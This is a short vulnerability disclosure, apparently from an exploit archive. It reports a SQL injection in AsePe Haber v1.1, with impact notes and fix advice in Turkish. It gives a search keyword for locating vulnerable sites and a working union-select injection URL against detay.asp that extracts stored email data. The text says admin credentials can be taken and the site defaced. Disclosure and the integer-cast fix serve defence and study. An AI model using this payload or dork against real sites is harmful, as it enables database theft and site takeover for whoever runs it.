AsePe Haber version 1.1 suffers from a remote SQL injection vulnerability.
8805a3a2bf560b56249922b4ffdf578bbd2f112c18307e91978b7b5e920b4955
< ------------------- header data start ------------------- >
################################################## ###########
# Application Name : AsePe Haber v1.1
# Vulnerable Type : SQL Injection
# Google Keyword : AsePe Haber v1.1
# Infection : Yönetici bilgileride dahil olmak üzere veritabanındaki tüm verilere erişim sağlanabilir. Elde edilen Yönetici şifresi ile sisteme giriş yapılarak haber vb. içerik eklemek suretiyle ilgili site ana sayfası yönlendirilerek hack edilebilir.
# Bug Fix Advice : id değişkeni sadece Integer değer alacak şekilde düzenlenmelidir.
İlgili Güvenlik açığının kapatılması için Örnek Kod: id = Cint(Request.QueryString(id))
# author : Bug Researchers
################################################## ###########
< ------------------- header data end of ------------------- >
< -- bug code start -- >
target] /detay.asp?id=-1+union+select+0,email,2,3,4,5,6,7,8,9,10+from+hab er
< -- bug code end of -- >